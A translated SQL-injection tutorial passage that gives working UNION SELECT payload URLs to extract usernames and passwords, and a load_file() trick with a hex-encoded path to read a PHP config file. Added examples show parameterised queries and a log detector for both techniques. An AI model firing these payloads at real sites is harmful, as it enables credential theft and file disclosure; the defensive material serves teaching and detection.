Three: Some injection techniques, many of them my own discoveries
1. UNION SELECT tips
UNION combines the results of several SELECT statements into one result set. The columns listed in each SELECT's select_expression must match in type, and the column names of the first SELECT are used as the column names of the result set.
We can use the following method to guess the column types, which saves a lot of time.
First we request:
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
(Figure 24)
Looking at the page, the software description shows 3 and the author shows 4, so we can guess that positions 3 and 4 are character columns; 14 appears in front of the download count, so that one should be an int.
Building on that, we assume that username and password are character columns too.
Try it!
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20dl_users
As shown in Figure 25.
Haha, with this method you can pretty much guess the types just by looking.
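The following is an added example, not code from the original tutorial: it reproduces the dlid injection above against a toy copy of the download page (SQLite in memory stands in for MySQL; the dl_files and dl_users tables and their contents are constructed for the demo, trimmed to five columns) and shows why the same payload does nothing once the query is parameterised.

```python
"""
Vulnerable string-built query beside its parameterised form, exercised with the
page's UNION payload. Table layout and rows are constructed for this example.
"""
import sqlite3


def make_db():
    """Build an in-memory stand-in for the download site's database."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE dl_files (id INTEGER, name TEXT, description TEXT,
                               author TEXT, downloads INTEGER);
        CREATE TABLE dl_users (username TEXT, password TEXT);
        INSERT INTO dl_files VALUES (1, 'notepad', 'A small editor', 'alice', 42);
        INSERT INTO dl_users VALUES ('admin', 'constructed-secret');
    """)
    return con


def fetch_unsafe(con, dlid):
    """Vulnerable: dlid is concatenated into the SQL text, as in the page's index.php."""
    sql = ("SELECT id, name, description, author, downloads "
           "FROM dl_files WHERE id = " + dlid)
    return con.execute(sql).fetchall()


def fetch_safe(con, dlid):
    """Hardened: a bound parameter; the driver never interprets dlid as SQL."""
    sql = ("SELECT id, name, description, author, downloads "
           "FROM dl_files WHERE id = ?")
    return con.execute(sql, (dlid,)).fetchall()


# The page's payload, cut down to this table's five columns: "and 1=2" empties
# the real result so only the UNION row is rendered, with username and
# password placed in the character-type positions (3 and 5 here).
PAYLOAD = "1 and 1=2 union select 1,2,password,4,username from dl_users"


def demo():
    """Return (rows leaked by the unsafe query, rows from the safe query with
    the same payload, rows from the safe query with a normal id)."""
    con = make_db()
    leaked = fetch_unsafe(con, PAYLOAD)
    blocked = fetch_safe(con, PAYLOAD)   # the whole string is compared to id, matches nothing
    normal = fetch_safe(con, "1")
    return leaked, blocked, normal


if __name__ == "__main__":
    leaked, blocked, normal = demo()
    print("unsafe query with payload:", leaked)
    print("safe query with payload:  ", blocked)
    print("safe query with id=1:     ", normal)
```

The leaked row shows the credentials landing exactly in the character-type column slots the tutorial guessed; with the placeholder version the entire payload is treated as one opaque value for id and returns no rows, which is the fix the page never states.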
2. load_file() tricks for reading and writing files
I don't know whether you have noticed, but when we read a PHP file with load_file(), its contents don't show up on the web page. For example:
c:/apache/htdocs/site/lib/sql.inc.php converted to hexadecimal: 0x433a2f6170616368652f6874646f63732f736974652f6c69622f73716c2e696e632e706870
We construct the following:
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(0x433a2f6170616368652f6874646f63732f736974652f6c69622f73716c2e696e632e706870),4,5,6,7,8,9,10,11
As shown in Figure 26.
The spot where the contents of sql.inc.php should have appeared is empty. Why?
Let's look at the page source first.
(Figure 27)
Haha, look at the marked spot: it was there all along. But why?
Because HTML uses < > for tags, the browser treats the file's <?php ... ?> block as markup and does not render it. Got it! Next time you'll know to check the page source.
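From the defender's side, both tricks on this page leave a recognisable trace in the web server log: a UNION SELECT in the query string, and a load_file() call whose argument is a 0x hex literal hiding the file path. The following is an added example, not part of the original tutorial: a small detector run over constructed Apache-style access log lines. It percent-decodes the request, collapses the doubled spaces, flags both patterns and decodes any hex literal back to text so the analyst can see which file was being read.

```python
"""
Detector for UNION SELECT and load_file() use in web access logs.
The log lines below are constructed for this example.
"""
import re
from urllib.parse import unquote_plus

LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /down/index.php?url=&dlid=1 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,password,4,username,6%20from%20dl_users HTTP/1.1" 200 5210',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(0x433a2f6170616368652f6874646f63732f736974652f6c69622f73716c2e696e632e706870),4,5 HTTP/1.1" 200 4020',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b", re.I)
LOAD_FILE_RE = re.compile(r"\bload_file\s*\(", re.I)
HEX_RE = re.compile(r"(?<![0-9a-zA-Z])0x((?:[0-9a-f]{2})+)\b", re.I)


def normalise(request_target):
    """Percent-decode the request target and collapse runs of whitespace
    (the page's %20%20 double space) so one pattern catches both spellings."""
    decoded = unquote_plus(request_target)
    return re.sub(r"\s+", " ", decoded)


def decode_hex_literals(text):
    """Turn every 0x.. literal into text; None where it is not valid UTF-8."""
    out = []
    for m in HEX_RE.finditer(text):
        try:
            out.append(bytes.fromhex(m.group(1)).decode("utf-8"))
        except UnicodeDecodeError:
            out.append(None)
    return out


def analyse(line):
    """Return a finding record for one log line, or None if it is not a request."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = normalise(m.group(1))
    findings = []
    if UNION_RE.search(target):
        findings.append("union-select")
    if LOAD_FILE_RE.search(target):
        findings.append("load_file")
    hex_decoded = decode_hex_literals(target) if findings else []
    return {"client": line.split()[0], "target": target,
            "findings": findings, "hex_decoded": hex_decoded}


def scan(lines):
    """Keep only the lines that triggered at least one finding."""
    return [r for r in (analyse(line) for line in lines) if r and r["findings"]]


if __name__ == "__main__":
    for rec in scan(LOG_LINES):
        print(rec["client"], rec["findings"], rec["hex_decoded"])
        print("   ", rec["target"])
```

Decoding the hex literal matters because it is the one piece of the request that names the asset at risk; here it recovers the sql.inc.php path from the tutorial. On the database side, load_file() only works for an account holding the FILE privilege and is confined by the secure_file_priv setting, so an application account without FILE, or a secure_file_priv that excludes the web root, removes this particular read regardless of the injection.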